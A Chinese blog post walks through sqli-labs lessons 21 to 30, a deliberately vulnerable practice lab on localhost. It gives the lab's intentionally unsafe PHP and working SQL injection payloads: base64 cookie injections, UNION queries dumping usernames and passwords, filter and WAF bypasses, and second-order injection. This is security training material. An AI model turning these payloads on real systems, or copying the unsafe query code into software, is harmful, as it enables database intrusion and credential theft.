SQLI-LAB  的 实战记录(Less 21 - Less 30)

最新推荐文章于 2024-07-02 18:29:06 发布
最新推荐文章于 2024-07-02 18:29:06 发布
阅读量5.4k 收藏 3
点赞数 2
分类专栏: sql注入 文章标签: sqli-lab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21500173/article/details/51964908
版权

以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。
因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。

(第21节:cookie注入 – 基于错误 – 复杂 - 字符串)

Test:

    http://localhost/sqli-lab/Less-21/index.php
        uname=Dumb&passwd=Dumb&submit=Submit

YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26
注: RHVtYg== 是 Dumb 经Base64加密后的值(密文后两位或一位 等于号 的 就可以考虑 Base64)
Base64编码/解码器 在线解码

    RHVtYlw=

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”Dumb\’) LIMIT 0,1’ at line 1
注: RHVtYlw= 是cookie中uname的值,明文 Dumb\
可以断定uname是有 一层单引号和一层括号 包裹

Sourse Code:

无cookie时 登录部分
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1){
    setcookie('uname', base64_encode($row1['username']), time()+3600);   
    print_r(mysql_error());           
    echo '<img src="../images/flag.jpg" />';
}else{
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';   
}

有cookie时 登录部分:

$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];           
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee);
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result=mysql_query($sql);
if (!$result) {
     die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row) {  
     echo 'Your Login name:'. $row['username'];    
     echo 'Your Password:' .$row['password'];
     echo 'Your ID:' .$row['id'];
} else{
     echo '<img src="../images/slap1.jpg" />';
}

Solution:

') or 1=1 #
Jykgb3IgMT0xICM=

其它:

JykgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSw2IG9yIDE9MSAj
明文   ') union select 1,database(),6 or 1=1 #

JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=
明文   ') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSxncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMgICM=
明文   ') union select 1,group_concat(username),group_concat(password) from security.users  #

注:以上均为cookie中uname的值

(第22节:cookie注入 – 基于错误 – 双引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-21/index.php
        uname=Dumb&passwd=Dumb&submit=Submit
    RHVtYlw=

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“Dumb\” LIMIT 0,1’ at line 1
注: RHVtYlw= 是cookie中uname的值,明文 Dumb\
可以断定uname是有 一层双引号 包裹

Sourse Code:

无cookie登录时:
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1) {
    setcookie('uname', base64_encode($row1['username']), time()+3600);   
    print_r(mysql_error());           
    echo '<img src="../images/flag.jpg" />';
}else{
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';   
}
有cookie登录时:
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;  
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];                  
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
$result=mysql_query($sql);
if (!$result) {
     die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];     
     echo 'Your Password:' .$row['password'];
     echo 'Your ID:' .$row['id'];
} else{
    echo '<img src="../images/slap1.jpg" />';
}

Solution:

IiBvciAxPTEgIw==
明文   " or 1=1 #

其它:

IiB1bmlvbiBzZWxlY3QgMSxkYXRhYmFzZSgpLDYgb3IgMT0xICM=
明文   " union select 1,database(),6 or 1=1 #

IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==
明文   " union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodXNlcm5hbWUpLGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyAgIw==
明文   " union select 1,group_concat(username),group_concat(password) from security.users  #

注:以上均为cookie中uname的值

Less - 23 Error Based- no comments

(第23节: 基于错误 – 无评论)

Test:

    http://localhost/sqli-lab/Less-23/index.php?id=2'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”2” LIMIT 0,1’ at line 1
注:能推断出 $id 周围是单引号

Sourse Code:

//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     print_r(mysql_error());
}

Solution:

    '  or '1' = '
    http://localhost/sqli-lab/Less-23/index.php?id='  or '1' = '

    其它:
    http://localhost/sqli-lab/Less-23/index.php?id='  union select 1,version(),3 or '1' = '

    http://localhost/sqli-lab/Less-23/index.php?id='  union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '

Less - 24 Second Degree Injections

(第24节:二次注入)

Test:

    http://localhost/sqli-lab/Less-24/index.php
        username=wolf  password=1111

注:因为sqli-lab出的时间比较早,所用的php版本也比较早(可能是5.2),其中用到的一些函数已被废除,所以需要修改成类似的。

Sourse Code:

login_create.php
     $link = mysqli_connect('localhost', 'root', '', 'security');
     $username=  mysqli_real_escape_string($link,$_POST['username']) ;
     $pass= mysqli_real_escape_string($link,$_POST['password']);
     $re_pass= mysqli_real_escape_string($link,$_POST['re_password']); 

     $sql = "insert into users (username, password) values(\"$username\", \"$pass\")";

login.php
   $link = mysqli_connect('localhost', 'root', '', 'security');
   $username = mysqli_real_escape_string($link,$_POST["login_user"]);
   $password = mysqli_real_escape_string($link,$_POST["login_password"]);
   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

Solution:

    username=admin" #  password=1111
     重置密码 改 1111 到 任意(比如666)
    username=admin  password=666 即可

Less - 25 Trick with OR & AND

(第25节:用 OR 和 AND 欺骗)

Test:

    http://localhost/sqli-lab/Less-25/index.php?id=1' #

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” LIMIT 0,1’ at line 1
注:id周围是单引号

    http://localhost/sqli-lab/Less-25/index.php?id=1' --+

注:无报错

Sourse Code:

function blacklist($id){
    $id= preg_replace('/or/i',"", $id);
    $id= preg_replace('/AND/i',"", $id);
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
     print_r(mysql_error());
}

注:and和or会被过滤,有报错,$id被单引号包围

Solution:

    http://localhost/sqli-lab/Less-25/index.php?id=0' oorr 1=1 --+

    http://localhost/sqli-lab/Less-25/index.php?id=2' aandnd 1=1 --+

    其它:

    http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,version(),database()--+

    http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+

注:过滤了and和or,但只有一次,所以多重复就好

Less - 25a Trick with OR & AND Blind

(第25节a:用 OR 和 AND 欺骗 与盲注)

Test:

    http://localhost/sqli-lab/Less-25a/index.php?id=1
    http://localhost/sqli-lab/Less-25a/index.php?id=2'
    http://localhost/sqli-lab/Less-25a/index.php?id=2"
    http://localhost/sqli-lab/Less-25a/index.php?id=2 oorr 1=1 #

注:id 周围没有符号 有 or 和 and 过滤

Sourse Code:

function blacklist($id){
    $id= preg_replace('/or/i',"", $id);
    $id= preg_replace('/AND/i',"", $id);
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
}

注:and和or会被过滤,无报错

Solution:

    http://localhost/sqli-lab/Less-25a/index.php?id=0 oorr 1=1 --+

    http://localhost/sqli-lab/Less-25a/index.php?id=2 aandnd 1=1 --+

     其它:

    http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+

Less - 26 Trick with comments

(第26节:用 评论 欺骗)

Test:

     http://localhost/sqli-lab/Less-26/index.php?id=0'")And AND and  or OR select union  /// #--/*+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”)selectunion’ LIMIT 0,1’ at line 1
注:id周围只有单引号,过滤得只剩”)selectunion

Sourse Code:

function blacklist($id) {
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{  
     print_r(mysql_error());
}

注:$id 周围是单引号,过滤了 or,and , /* , – , # , 空格 , /

Solution:

    http://localhost/sqli-lab/Less-26/index.php?id=1'%26%26'1

    其它:

    http://localhost/sqli-lab/Less-26/index.php?id=0'%A0UNION%A0SELECT%A01,version(),database()%26%26%a0'1

    http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0'1

    http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0'1

注:用%A0替代空格使用,用&&(%26%26)替代AND使用

Less - 26a Trick with comments

(第26a节:用 评论 欺骗)

Test:

    http://localhost/sqli-lab/Less-26a/index.php?id=1')")And AND and  or OR select union  /// #--/*+

注:被过滤得只剩’)”)selectunion 无sql查询报错

     http://localhost/sqli-lab/Less-26a/index.php?id=1'%A0%26%26%A0 '1'='1

     http://localhost/sqli-lab/Less-26a/index.php?id=1"%A0%26%26%A0 "1"="1

     http://localhost/sqli-lab/Less-26a/index.php?id=1")%A0%26%26%A0 ("1")=("1

注:都不报错,不知道格式是什么

    http://localhost/sqli-lab/Less-26a/index.php?id=0'%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0'1

注:都有php的报错,可能格式错了,查询不到

    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1

注:这次对了

Sourse Code:

function blacklist($id){
    $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
    $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --
    $id= preg_replace('/[#]/',"", $id);            //Strip out #
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces
    $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
}

注:$id 周围是单引号和括号,过滤了 or,and , /* , – , # , 空格 , /

Solution:

    http://localhost/sqli-lab/Less-26a/index.php?id=1')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1

    其它:

    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,version(),database()%26%26%a0('1

    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0('1

    http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0('1

Less - 27 Trick with SELECT & UNION

(第27节:用 UNION 和 SELECT 欺骗)

Test:

    http://localhost/sqli-lab/Less-27/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”)AndANDandorOROror’ LIMIT 0,1’ at line 1
注:Id的周围是单引号,会过滤union和select及有注释作用的符号

Sourse Code:

function blacklist($id){
    $id= preg_replace('/[\/\*]/',"", $id);       //strip out /*
    $id= preg_replace('/[--]/',"", $id);          //Strip out --.
    $id= preg_replace('/[#]/',"", $id);           //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);         //Strip out spaces.
    $id= preg_replace('/select/m',"", $id);   //Strip out spaces.
    $id= preg_replace('/[ +]/',"", $id);         //Strip out spaces.
    $id= preg_replace('/union/s',"", $id);    //Strip out union
    $id= preg_replace('/select/s',"", $id);    //Strip out select
    $id= preg_replace('/UNION/s',"", $id);  //Strip out UNION
    $id= preg_replace('/SELECT/s',"", $id);   //Strip out SELECT
    $id= preg_replace('/Union/s',"", $id);     //Strip out Union
    $id= preg_replace('/Select/s',"", $id);     //Strip out select
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
     print_r(mysql_error());  
}

Solution:

    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0or(1)=(1)%26%26%a0'1

    其它:

    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0'1

    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0'1

    http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0'1

Less - 27a Trick with SELECT & UNION

(第27a节:用 UNION 和 SELECT 欺骗)

Test:

    http://localhost/sqli-lab/Less-27a/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+

注:无sql查询报错,过滤后还剩 0’”)AndANDandorOROror

Sourse Code:

function blacklist($id){
    $id= preg_replace('/[\/\*]/',"", $id);        //strip out /*
    $id= preg_replace('/[--]/',"", $id);        //Strip out --.
    $id= preg_replace('/[#]/',"", $id);            //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
    $id= preg_replace('/select/m',"", $id);        //Strip out spaces.
    $id= preg_replace('/[ +]/',"", $id);        //Strip out spaces.
    $id= preg_replace('/union/s',"", $id);        //Strip out union
    $id= preg_replace('/select/s',"", $id);        //Strip out select
    $id= preg_replace('/UNION/s',"", $id);        //Strip out UNION
    $id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT
    $id= preg_replace('/Union/s',"", $id);        //Strip out Union
    $id= preg_replace('/Select/s',"", $id);        //Strip out Select
    return $id;
}
$id= blacklist($id);
$hint=$id;
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
}

Solution:

    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0or(1)=(1)%26%26%a0"1

    其它:

    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0"1

    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0"1

    http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0"1

Less - 28 Trick with SELECT & UNION

(第28节:用 UNION 和 SELECT 欺骗 )

Test:

    http://localhost/sqli-lab/Less-28/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select /// #--?/*+

注: 过滤了union空格select 这种组合与全部空格,无sql查询报错

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect

注:UnIon%A0SeLect 中间不是空格了,没被过滤

    http://localhost/sqli-lab/Less-28/index.php?id=0'%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0'

注:有php报错

     http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('

注:这个对了,说明id周围是单引号和括号

Sourse Code:

function blacklist($id){
    $id= preg_replace('/[\/\*]/',"", $id);                //strip out /*
    $id= preg_replace('/[--]/',"", $id);                //Strip out --.
    $id= preg_replace('/[#]/',"", $id);                    //Strip out #.
    $id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
    $id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
    $id= preg_replace('/union\s+select/i',"", $id);        //Strip out UNION & SELECT.
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
}

Solution:

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('

    其它:

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0('1

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0('1

    http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0('1

Less - 28a Trick with SELECT & UNION

(第28节a:用 UNION 和 SELECT 欺骗 )

Test:

    http://localhost/sqli-lab/Less-28a/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select  /// #--?/*+
注: 过滤了union空格select 这种组合,无sql查询报错

    http://localhost/sqli-lab/Less-28a/index.php?id=1') --
注: 正常显示,没过滤空格和有注释作用的符号

Sourse Code:

function blacklist($id){
    $id= preg_replace('/union\s+select/i',"", $id);
    return $id;
}
$id= blacklist($id);
$hint=$id;
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{  
}

Solution:

    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,2,3--+

    其它:

    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,version(),database()--+

    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

    http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(username),group_concat(password) from security.users where 1--+

Less - 29 Protection with WAF

(第29节:用WAF防护)

Test:

    http://localhost/sqli-lab/Less-29/login.php?id=0' union select 1,2,3 --+

注:被检测到有问题,跳转到其他的页面了

Sourse Code:

login.php
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
    $match = preg_match("/^\d+$/", $input);
    if($match) {
    }else {   
        header('Location: hacked.php');
    }
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
    $q_s = $query_string;
    $qs_array= explode("&",$q_s);
    foreach($qs_array as $key => $value) {
        $val=substr($value,0,2);
        if($val=="id") {
            $id_value=substr($value,3,30);
            return $id_value;
            echo "<br>";
            break;
        }
    }
}
$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
} else{
     print_r(mysql_error());
}

Solution:

    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,2,3 --+

    其它:

    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+

Less - 30 Protection with WAF

(第30节:用WAF防护)

Test:

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=6

注:显示的是id为6的内容

Sourse Code:

$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
      echo 'Your Login name:'. $row['username'];
      echo 'Your Password:' .$row['password'];
} else{
    print_r(mysql_error());
}
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
    $match = preg_match("/^\d+$/", $input);
    if($match) {
    } else {   
        header('Location: hacked.php');
    }
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
    $q_s = $query_string;
    $qs_array= explode("&",$q_s);
     foreach($qs_array as $key => $value) {
        $val=substr($value,0,2);
        if($val=="id") {
            $id_value=substr($value,3,30);
            return $id_value;
            break;
        }
    }
}

Solution:

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,2,3 --+

    其它:

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
战狼767
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Sqli-Lab | Less 21-23
酉酉的博客
02-08 575
sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入 Less-21 Less-21 Cookie Injection- Error Based- complex - string cookie注入-基于错误-复杂-字符串 测试 登录进去 uname的值被加密,以=结尾,首先想到base64 不出意外是base64加密 burp抓包,然后改cookie中的uname再加密就...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
sqli-labs (less-21)
kukudeshuo的博客
03-11 316
sqli-labs (less-21) 进入21关,输入用户名与密码,发现跟20关基本一样,这里我们猜想也是在cookie的位置进入注入 利用Cookies Manager +抓取到cookie信息后,发现竟然是一串字母,这里就很懵了,但我们仔细查看特征后,发现只是利用了base64加密 转码后发现就是admin,所以这里的思路就是先构造我们的SQL语句,然后再随便找一个base64网站转码就行了 #以下过程均是base64转码后的结果 先输入一个 Jw== #'单引号 屏幕回显错误,根据错误信息
详细SQLI-labs(1-21)通关攻略
最新发布
m0_52774990的博客
07-02 791
首先在url后加上?Id=1确定是否有注入点。然后根据输入内容来确定注入点类型: 输入id=1 and 1=2 回显正常,确定为字符型注入。输入?id=1 and '1'='2'显示报错信息。查询表的列数:由于是字符型注入,故应添加单引号来形成断句,后使用order by语句来查询表的列数,当查询数为4的时候,显示报错,代表此表只有三列。使用union语句查询?Id=-1' union select 1,2,3 --+ 可发现第二三列查询结果会回显至结果中。
SQLi LABS Less-21
热门推荐
wangyuxiang946的博客
08-14 1万+
sqlibals21SQLI-LABS第二十一关,sqlilabs二十一关
sqli-labs less21
qq_45106794的博客
10-26 303
#sqli-labs less 19 这一关大概与less18差不多,只不过playload得用base64加密 ') order by 4 ') union select 1,2,3 # ')union select 1,database(),version()# ')union select 1,(select group_concat(table_name) from information...
sqli-labs:less-21
羽的博客
09-10 179
和20题很像。 然后一看cookie是一个base64编码的,解码一下,是Dumb。 所以cookie一个是注入点,只是有个base64编码 随便提一下: base32 只有大写字母和数字数字组成,或者后面有三个等号。 base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。 这样也就是要将原来的注入语句进行base64编码以后在放到cookie中进行注入。 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-lab注入练习源码
06-25
通过sqli-lab实战练习,你不仅可以学习到如何进行SQL注入攻击,更重要的是,你还能了解到如何在实际开发中预防这种攻击,提升你的Web应用安全性。因此,无论你是开发者还是安全专业人员,这个平台都是提升SQL注入...
SQLi-Lab:每个SQL注入实验室
03-29
8. **实战演练**:通过SQLi-Lab提供的各种挑战,实践上述理论知识,增强识别和修复SQL注入漏洞的能力。 9. **工具使用**:了解和使用SQL注入检测工具,如Burp Suite、sqlmap等,以及如何利用它们进行自动化渗透测试...
sqli-labs————less 21
Fly_鹏程万里
05-12 1569
Less-21做一个简单测试:username:adminpassword:aaa这里的界面和上一关的内容差不多,唯一的区别就是cookie使用了base64进行了加密,这里我们贴出该关的代码:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm...
sqli-labs————Less-30
Fly_鹏程万里
05-19 438
Less-30查看源代码:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt; &lt;html xmlns="http://www.w3.org/1999/xhtml"&gt; &lt;head&..
sqli-labs-less-12 PODT传参+有回显信息(图文详解)
yzcn
11-02 450
